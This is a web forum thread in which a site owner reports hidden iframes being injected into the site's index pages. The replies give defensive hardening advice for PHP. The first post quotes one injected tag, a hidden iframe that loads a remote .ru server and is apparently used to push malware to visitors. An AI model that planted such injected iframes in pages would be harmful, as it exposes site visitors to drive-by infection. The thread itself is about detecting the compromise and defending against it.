Results 1 to 3 of 3

Thread: Need Urgent Help About Critical Security Problem

  1. #1
    Join Date
    Sep 2006
    Wixom, MI

    Unhappy Need Urgent Help About Critical Security Problem


    We are getting bombarded every so often with someone accessing our site somehow and modifying page content to include ifram tags on index pages of our site.

    We have no idea what is causing it how they are getting in or how to stop it.

    If anyone has any info or advice please email me asap.

    Below is an example of one of the many ifram tags that randomly gets inserted into our index pages on all folders within or site.

    <iframe src="http://3f0.ru:8080/index.php" width=104 height=176 style="visibility: hidden"></iframe>
    From what we have researched some of them are trying to open sites that either download dodgy programs or in some way try to compromise the site or the viewer.

    We have this happen several times a week, not sure if a php script we have installed is somehow compromised and people are exploiting it but here is our site http://www.MyLifestyleSavings.com i am helping build it for someone and they have notified me about the problem and im at a loss.

    Thanks in advance for any and all help.
    OriginalFundRaisingWidget - Free "Non Commercial" PayPal FundRaising Widget, for Charities, Organizations and Individuals, Hosted Free. Check It Out

  2. #2
    Join Date
    Aug 2004
    First thing is to change all your passwords on the server (including FTP users), making sure you use "strong" passwords for the new ones.

    Any directory that does not need to have files written to it by your PHP scripts should have its permissions set so that only the owner (you) has write permission. The corollary is to try to avoid having any sensitive scripts in world-writable directories. (So in other words, make a separate directory for things like file uploads, and leave all your script/include directories read-only for the world.)

    Review all your scripts for anywhere that you use user inputs to select files that get included (or worse, executed). If you have control of your PHP settings via php.ini or .htaccess, at the very least turn off allow_url_include, and consider turning off allow_url_fopen if you don't need it.

    Review your Apache access logs if you have access to them, and look for things where the URL includes external URLs in the query string, or "../../" type of directory strings trying to move up the directory tree and read something on the server. These may point you toward a script that someone has found a hole in.
    "Well done....Consciousness to sarcasm in five seconds!" ~ Terry Pratchett, Night Watch

    How to Ask Questions the Smart Way (not affiliated with this site, but well worth reading)

    My Blog
    cwrBlog: simple, no-database PHP blogging framework

  3. #3
    Join Date
    Jan 2009
    PHP Code:
    Parse errorsyntax errorunexpected T_STRINGexpecting ',' or ';' in /home/mylifest/public_html/index.php on line 86 
    I would say that if thats not you thats broke it, someones broken your site...

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
HTML5 Development Center